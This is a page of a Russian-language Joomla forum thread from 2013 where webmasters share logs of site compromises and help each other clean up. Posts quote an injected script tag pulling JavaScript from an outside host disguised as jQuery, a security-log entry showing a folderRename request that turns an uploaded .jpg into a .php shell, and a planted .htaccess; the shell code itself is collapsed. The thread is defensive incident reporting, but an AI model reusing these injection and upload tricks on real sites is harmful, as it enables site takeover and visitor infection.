Новости Joomla

Что нового в joomla 5.1?

Что нового в joomla 5.1?

16 апреля 2024 года вышли релизы Joomla 5.1 и Joomla 4.4.4. Если Joomla 4.x уже находится в режиме поддержки и получает только "заплатки", то в каждом выпуске Joomla 5.x появляется что-то новое. Краткий список был опубликован в недавней новости. Давайте посмотрим подробнее на то что же именно появилось в Joomla 5.1.

Добавление полей Joomla в результаты Умного Поиска при помощи JFilters

Страница результатов Умного Поиска позволяет нам отображать некоторые поля (изображение, категорию, дату и т. д.), но не пользовательские поля. Поскольку поля Joomla предоставляют очень гибкий способ добавления дополнительных свойств к нашему контенту, их отображение в результатах поиска может сделать результаты более значимыми.

Вышел JoomShopping 5.4.0

Один из популярных компонентов интернет-магазина для Joomla за недавнее время получил 3 релиза: 5.3.4, 5.3.5, 5.4.0.

1 ... 8 9 10 11 12 ... 23   Вниз
0 Пользователей и 1 Гость просматривают эту тему.
  • 678 Ответов
  • 244127 Просмотров
*

Очередной вебмастер

  • Давно я тут
  • 768
  • 55 / 0
  • лысый умный дядя
Re: Логи попыток взлома выкладывать сюда. Инструкция тоже тут + расширения форумчан для лечения
« Ответ #270 : 18.07.2013, 00:12:59 »
Ну её мое уже и до моего VDS добрался...
Сегодня зашел на аккаунт Gmail - в папке Spam обнаружил 3500 писем с домена, к которому привязан ящик.
Формат писем:

Спойлер
[свернуть]
Файл 7c334.php содержал что то наподобие:
Спойлер
[свернуть]
Прибил гада.

Компроментирован  ли теперь пользователь  VDS? В заголовках проскакивает что то про FreeBSD - я должен что то сообщить хостеру?
Записан
Сайты на Joomla, разработка и поддержка
----------
Помог ответ - жми плюс!
*

draff

  • Гуру
  • 5803
  • 434 / 7
  • ищу работу
Re: Логи попыток взлома выкладывать сюда. Инструкция тоже тут + расширения форумчан для лечения
« Ответ #271 : 18.07.2013, 07:50:14 »
А что хостер, отпишет про проблемы со скриптами сайта.
Ищи шелл в файлах сайта. Владельцы файлов сайта разные на VDS ?
Записан
*

wishlight

  • Живу я здесь
  • 4981
  • 293 / 1
  • от 150 руб быстрый хостинг без блокировок
Re: Логи попыток взлома выкладывать сюда. Инструкция тоже тут + расширения форумчан для лечения
« Ответ #272 : 18.07.2013, 08:18:51 »
Про пользователя - может да, а может и нет. Логи доступа могут подсказать. Скорее всего взломан именно сайт. Вы про root или пользователя аккаунта?
Записан
*

Очередной вебмастер

  • Давно я тут
  • 768
  • 55 / 0
  • лысый умный дядя
Re: Логи попыток взлома выкладывать сюда. Инструкция тоже тут + расширения форумчан для лечения
« Ответ #273 : 18.07.2013, 10:32:06 »
Цитата: wishlight от 18.07.2013, 08:18:51
Про пользователя - может да, а может и нет. Логи доступа могут подсказать. Скорее всего взломан именно сайт. Вы про root или пользователя аккаунта?
Я про пользователя аккаунта. Сам понимаю что "ступил" повесив одного пользователя на все домены, ща придется переделывать...
Записан
Сайты на Joomla, разработка и поддержка
----------
Помог ответ - жми плюс!
*

wishlight

  • Живу я здесь
  • 4981
  • 293 / 1
  • от 150 руб быстрый хостинг без блокировок
Re: Логи попыток взлома выкладывать сюда. Инструкция тоже тут + расширения форумчан для лечения
« Ответ #274 : 18.07.2013, 13:30:20 »
Тут только лог доступа подскажет что-то. Да, на одного не надо было.
Записан
*

Очередной вебмастер

  • Давно я тут
  • 768
  • 55 / 0
  • лысый умный дядя
Re: Логи попыток взлома выкладывать сюда. Инс
« Ответ #275 : 31.07.2013, 00:30:45 »
Опять мне повезло, в ходе дальнейшего расследования проводимого моими силами и силами хостера (за что ему отдельное спасибо), на VDS был обнаружен модуль маскирующийся под модуль статей /modules/mod_articles1/
В составе:
mod_articles1.xml
Спойлер
[свернуть]
7c334.php
Спойлер
[свернуть]
mod_articles1.php
Спойлер
[свернуть]
« Последнее редактирование: 31.07.2013, 09:28:40 от flyingspook »
Записан
Сайты на Joomla, разработка и поддержка
----------
Помог ответ - жми плюс!
*

wishlight

  • Живу я здесь
  • 4981
  • 293 / 1
  • от 150 руб быстрый хостинг без блокировок
Re: Логи попыток взлома выкладывать сюда. Инструкция тоже тут + расширения форумчан для лечения
« Ответ #276 : 31.07.2013, 09:19:14 »
Обычный шелл
Записан
*

Очередной вебмастер

  • Давно я тут
  • 768
  • 55 / 0
  • лысый умный дядя
Re: Логи попыток взлома выкладывать сюда. Инструкция тоже тут + расширения форумчан для лечения
« Ответ #277 : 01.08.2013, 17:50:53 »
Вот ведь засранцы - такой баг прозевали, а я думаю какого лешего кто то загружает на мои сайты всягое Г
(Перевод: Недостаточная фильтрация приводит к возможности обхода ограничений на загрузку файлов.)
Записан
Сайты на Joomla, разработка и поддержка
----------
Помог ответ - жми плюс!
*

sokol-iz-ussr

  • Захожу иногда
  • 90
  • 0 / 0
Re: Логи попыток взлома выкладывать сюда. Инструкция тоже тут + расширения форумчан для лечения
« Ответ #278 : 02.08.2013, 03:03:16 »
Цитата: Очередной вебмастер от 01.08.2013, 17:50:53
Вот ведь засранцы - такой баг прозевали, а я думаю какого лешего кто то загружает на мои сайты всягое Г
(Перевод: Недостаточная фильтрация приводит к возможности обхода ограничений на загрузку файлов.)

что это? в Joomla - Joomla! 2.5.8 есть такой баг?
Записан
*

wishlight

  • Живу я здесь
  • 4981
  • 293 / 1
  • от 150 руб быстрый хостинг без блокировок
Re: Логи попыток взлома выкладывать сюда. Инструкция тоже тут + расширения форумчан для лечения
« Ответ #279 : 02.08.2013, 07:55:36 »
Версии: 2.5.13 и более ранние версий 2.5.x. 3.1.4 и более ранние версий 3.x.
Записан
*

mj23

  • Осваиваюсь на форуме
  • 28
  • 2 / 0
Re: Логи попыток взлома выкладывать сюда. Инструкция тоже тут + расширения форумчан для лечения
« Ответ #280 : 15.08.2013, 17:14:08 »
Я на хостинге поставил крон-задание (присылать отчет 1р в сутки) чтобы сканировал public_html на предмет появления новых файлов .php , .html, .gif

Сегодня ночью закачали 2 шелла
/home/****/public_html/site1/components/com_acepolls/xmikm3.php
/home/****/public_html/site2/libraries/cms/version/umps75.php

вроде все пообновлял, месяц была тишина, а тут опять дырку нашли :(
как я понял нашли дырку в компоненте голосовалка acepolls и в библиотеке, если голосовалку можно удалить, то что вот делать с библиотекой :( походу это глобальная уязвимость в Joomla.

п.с. Joomla 2.5.13 + adminexile + jHackGuard + marcosinterceptor11j16
причем jHackGuard и marcosinterceptor11j16 вообще не прислали никакого отчета о проникновении
Записан
*

wishlight

  • Живу я здесь
  • 4981
  • 293 / 1
  • от 150 руб быстрый хостинг без блокировок
Re: Логи попыток взлома выкладывать сюда. Инструкция тоже тут + расширения форумчан для лечения
« Ответ #281 : 15.08.2013, 18:10:33 »
Надо бы обновить сначала Joomla до 2.5.14 , а то вроде там что-то нашли. А шелл могли при желании куда угодно залить. Сколько сайтов на аккаунте?
Записан
*

verstalshik

  • Завсегдатай
  • 1754
  • 95 / 1
Re: Логи попыток взлома выкладывать сюда. Инструкция тоже тут + расширения форумчан для лечения
« Ответ #282 : 15.08.2013, 19:20:00 »
эти черти уже в открытую продают, во черти-то
щас учащиеся общеобразовательных учреждении накупят и третья волна попрет... или какая там уже...

Спойлер
[свернуть]
Записан
❶ НЕ СПРАВЛЯЕШЬСЯ САМ???  Поможем тут...  ❷ Калькулятор доставки - ЗАКАЖИ!!!...  ❸ Каталог компаний - ЖМИ!!!...  ❹ НОВИЧКИ! ВСЕ сюда! Первая консультация БЕСПЛАТНО!!
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Re: Логи попыток взлома выкладывать сюда. Инструкция тоже тут + расширения форумчан для лечения
« Ответ #283 : 15.08.2013, 20:12:38 »
Цитата: verstalshik от 15.08.2013, 19:20:00
эти черти уже в открытую продают, во черти-то
щас учащиеся общеобразовательных учреждении накупят и третья волна попрет... или какая там уже...


опасно тем что их машины станут ботами, а они бараны ни чего не сломают, хотя этот брут на плохих каналах работать только как ddos будет, хостеров жалко да и сайтам достанется, будут в дауне вместе с серверами

сами то не брутят с ПК-шек, просто ботсеть решили нарастить еще и заработать, маркетинг, красаВЧеки
Записан
*

Очередной вебмастер

  • Давно я тут
  • 768
  • 55 / 0
  • лысый умный дядя
Re: Логи попыток взлома выкладывать сюда. Инструкция тоже тут + расширения форумчан для лечения
« Ответ #284 : 15.08.2013, 21:42:27 »
Сегодня просматривая страницы в индексе яндекса нашел у себя:
В /libraries/mosets/profilepicture/file
Аккуратненько так пачечька страничек сложена - заархивировал, прикладываю к посту, может кому интересно покопаться будет.
Записан
Сайты на Joomla, разработка и поддержка
----------
Помог ответ - жми плюс!
*

WebDisaster

  • Захожу иногда
  • 108
  • 12 / 0
Re: Логи попыток взлома выкладывать сюда. Инструкция тоже тут + расширения форумчан для лечения
« Ответ #285 : 16.08.2013, 06:32:31 »
Цитата: mj23 от 15.08.2013, 17:14:08
закачали 2 шелла
/home/****/public_html/site1/components/com_acepolls/xmikm3.php
/home/****/public_html/site2/libraries/cms/version/umps75.php

как я понял нашли дырку в компоненте голосовалка acepolls и в библиотеке
Вывод о локализации уязвимости в конкретных скриптах сделан по анализу логов взлома?
Или по тому, в какую директорию хоста засунули шелл? Второй вариант действий ошибочен.
Записан
*

mj23

  • Осваиваюсь на форуме
  • 28
  • 2 / 0
Re: Логи попыток взлома выкладывать сюда. Инструкция тоже тут + расширения форумчан для лечения
« Ответ #286 : 16.08.2013, 13:24:52 »
WebDisaster, логов нету. подумал куда залили, там и дырка.
прогнал сайты файликом fls.php, шеллов не нашел, только такие
File: /home/***/public_html/site2/libraries/cms/version/version_sys.php
String:: $_POST[
File: /home/***/public_html/site2/administrator/templates/hathor/html/com_menus/menus/default.php
String:: confirm(

wishlight, 3 сайта. обновился до 2.5.14


Еще вот нашел старые логи jhackguard

Спойлер
[свернуть]
что это значит? в каких папках что где менялось/делалось?
« Последнее редактирование: 16.08.2013, 14:02:55 от mj23 »
Записан
*

mj23

  • Осваиваюсь на форуме
  • 28
  • 2 / 0
Re: Логи попыток взлома выкладывать сюда. Инструкция тоже тут + расширения форумчан для лечения
« Ответ #287 : 24.08.2013, 20:47:04 »
опять таже картина
/home/***/public_html/site1/components/com_acepolls/2nzm91.php
/home/***/public_html/site2/libraries/cms/version/b3ybhf.php
в те же папки.
за день до появления файлов jhackguard-log
#Fields: datetime   priority   category   message
2013-08-22T18:16:17+00:00   CRITICAL   jhackguard   Changed POST value from:{\"fn\":\"folderRename\",\"args\":[\"./im6713n5g.jpg\",\"./wthm5643g.php\"]} to:{"fn":"folderRename","args":["./im6713n5g.jpg","./wthm5643g.php"]}
2013-08-22T18:16:19+00:00   CRITICAL   jhackguard   Changed POST value from:{\"fn\":\"folderRename\",\"args\":[\"./im6713n5g.jpg\",\"./wthm9288g.php\"]} to:{"fn":"folderRename","args":["./im6713n5g.jpg","./wthm9288g.php"]}

п.с. Joomla 2.5.14 +adminexile + jHackGuard + marcosinterceptor11j16

буду пробовать ставить акиба админ тулс про
Записан
*

wishlight

  • Живу я здесь
  • 4981
  • 293 / 1
  • от 150 руб быстрый хостинг без блокировок
Re: Логи попыток взлома выкладывать сюда. Инструкция тоже тут + расширения форумчан для лечения
« Ответ #288 : 24.08.2013, 20:56:07 »
Лучше поставьте то, что будет отслеживать модификацию и добавление файлов, а потом смотрите по логу сервера, как это делается. И главное - никакого вареза. JHacker Watch или Eyesite. По возможности обновить все расширения. Желательно просканировать сайты ai-bolit.
Записан
*

mj23

  • Осваиваюсь на форуме
  • 28
  • 2 / 0
Re: Логи попыток взлома выкладывать сюда. Инструкция тоже тут + расширения форумчан для лечения
« Ответ #289 : 27.08.2013, 00:17:52 »
wishlight, спасибо! ai-bolit'ом вычистил около 50  левых index.php, как раз в тех папках куда закачивают шеллы находились файлы version_sys.php и com_acepolls.php с одинаковым содержимым
по мимо этого в некоторые JPG был вставлен вредоносный код.
вообщем целый день потратил на чистку. будем надеяться поможет.
до ai-bolit содержимое проверял скриптом fls.php и он ничего подобного не обнаружил.
« Последнее редактирование: 27.08.2013, 13:45:15 от mj23 »
Записан
*

wishlight

  • Живу я здесь
  • 4981
  • 293 / 1
  • от 150 руб быстрый хостинг без блокировок
Re: Логи попыток взлома выкладывать сюда. Инструкция тоже тут + расширения форумчан для лечения
« Ответ #290 : 07.09.2013, 09:10:24 »
Спойлер
[свернуть]
Записан
*

draff

  • Гуру
  • 5803
  • 434 / 7
  • ищу работу
Re: Логи попыток взлома выкладывать сюда. Инструкция тоже тут + расширения форумчан для лечения
« Ответ #291 : 07.09.2013, 09:26:43 »
6.09 вечером 5 писем получил.атака на сайт, где нет cuhena
Спойлер
[свернуть]
IP забанил в nginx .
А на сайте клиента, где стоит cuhena , был только один запрос с этого же IP 94.228.220.68
-> POST /option=com_kunena
Записан
*

wishlight

  • Живу я здесь
  • 4981
  • 293 / 1
  • от 150 руб быстрый хостинг без блокировок
Re: Логи попыток взлома выкладывать сюда. Инструкция тоже тут + расширения форумчан для лечения
« Ответ #292 : 07.09.2013, 10:23:09 »
в общем хлопцы работают
Записан
*

Очередной вебмастер

  • Давно я тут
  • 768
  • 55 / 0
  • лысый умный дядя
Re: Логи попыток взлома выкладывать сюда. Инструкция тоже тут + расширения форумчан для лечения
« Ответ #293 : 13.09.2013, 20:05:24 »
Вот ведь скоты!
Во всех сайтах что на WP что на Joomla за 3 последних дня внедрение идет <script language="JavaScript" src="http://stummann.net/steffen/google-analytics/jquery-1.6.5.min.js" type="text/javascript"></script> прямо перед тегом <body>
Админки везде прикрыты, файлы 644, папки 755. КАК? Неуж то кто то учетку уже взломал по FTP. У меня скоро мания преследования начнется.
Пошел менять пароли где только можно... Грусть... Печаль... >:(
Записан
Сайты на Joomla, разработка и поддержка
----------
Помог ответ - жми плюс!
*

draff

  • Гуру
  • 5803
  • 434 / 7
  • ищу работу
Re: Логи попыток взлома выкладывать сюда. Инструкция тоже тут + расширения форумчан для лечения
« Ответ #294 : 13.09.2013, 20:18:40 »
VPS ? с разными аккаунтами для всех сайтов?
А зачем ftp, а SSH ?
Записан
*

Очередной вебмастер

  • Давно я тут
  • 768
  • 55 / 0
  • лысый умный дядя
Re: Логи попыток взлома выкладывать сюда. Инструкция тоже тут + расширения форумчан для лечения
« Ответ #295 : 17.09.2013, 23:32:46 »
Цитата: draff от 13.09.2013, 20:18:40
VPS ? с разными аккаунтами для всех сайтов?
А зачем ftp, а SSH ?
3 сайта все еще на одном акке
SSH - отключил еще 2 месяца назад на всех аккаунтах.
Вирус очень как то он хитро прописывает свой JS в блок head всех файлов index.php:
Код
<script language="JavaScript" src="http://stummann.net/steffen/google-analytics/jquery-1.6.5.min.js" type="text/javascript"></script>
Пишется походу регуляркой, так как скрипт четко всегда появляется перед </head>
Сегодня нашел папочки в корне сайтов - названия разные (cigarette и т.п.)
Папка  - права 777
В папке 2 файла:
.htaccess
Код
RewriteEngine On

RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_FILENAME} !-f

RewriteRule index.php.* - [L]

RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_FILENAME} !-f

RewriteRule ^(.*) index.php?id=$1



index.php

Спойлер
[свернуть]
Записан
Сайты на Joomla, разработка и поддержка
----------
Помог ответ - жми плюс!
*

Очередной вебмастер

  • Давно я тут
  • 768
  • 55 / 0
  • лысый умный дядя
Re: Логи попыток взлома выкладывать сюда. Инструкция тоже тут + расширения форумчан для лечения
« Ответ #296 : 17.09.2013, 23:58:11 »
Да, походу прописывается везде где найдет </head>  :'( Блин.
Записан
Сайты на Joomla, разработка и поддержка
----------
Помог ответ - жми плюс!
*

aspidy

  • Завсегдатай
  • 1008
  • 55 / 1
  • Миграция joomla 1.0-1.5-2.5
Re: Логи попыток взлома выкладывать сюда. Инструкция тоже тут + расширения форумчан для лечения
« Ответ #297 : 18.09.2013, 07:26:28 »
Для того, чтобы эти файлы грузились на сайт, где то оставлена "дыра". Ищите ее. До тех пор, пока не заделаете дыры, взломы продолжаться.
Записан
Мелкий ремонт. skype poisk-plus
*

draff

  • Гуру
  • 5803
  • 434 / 7
  • ищу работу
Re: Логи попыток взлома выкладывать сюда. Инструкция тоже тут + расширения форумчан для лечения
« Ответ #298 : 18.09.2013, 08:02:56 »
отключи  curl_exec . А нужно обновить - включишь
Записан
*

Очередной вебмастер

  • Давно я тут
  • 768
  • 55 / 0
  • лысый умный дядя
Re: Логи попыток взлома выкладывать сюда. Инструкция тоже тут + расширения форумчан для лечения
« Ответ #299 : 18.09.2013, 22:27:18 »
Цитата: aspidy от 18.09.2013, 07:26:28
Для того, чтобы эти файлы грузились на сайт, где то оставлена "дыра". Ищите ее. До тех пор, пока не заделаете дыры, взломы продолжаться.
да, вы правы.
Хостер нашел сегодня дыры:
Спойлер
[свернуть]
Записан
Сайты на Joomla, разработка и поддержка
----------
Помог ответ - жми плюс!
1 ... 8 9 10 11 12 ... 23   Вверх
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

При открытии сайта с режима инкогнито перекидывает на вирусный сайт

Автор 62411

 Ответов: 6
Просмотров: 347 		Последний ответ 31.03.2024, 16:14:32
от SeBun
Скрипты защиты Joomla 4

Автор mister_boy

 Ответов: 6
Просмотров: 1167 		Последний ответ 16.05.2023, 16:38:58
от mister_boy
Способы защиты сайта от DDoS атак?

Автор IgorMJ

 Ответов: 7
Просмотров: 1314 		Последний ответ 05.10.2021, 21:39:26
от ShopES
Тестирую сайты на уязвимости

Автор SalityGEN

 Ответов: 0
Просмотров: 486 		Последний ответ 21.08.2021, 23:01:01
от SalityGEN
Новый набег ботов в регистрации сайта... Какой в этом смысл то?

Автор Cedars

 Ответов: 11
Просмотров: 1090 		Последний ответ 03.11.2020, 17:36:03
от Cedars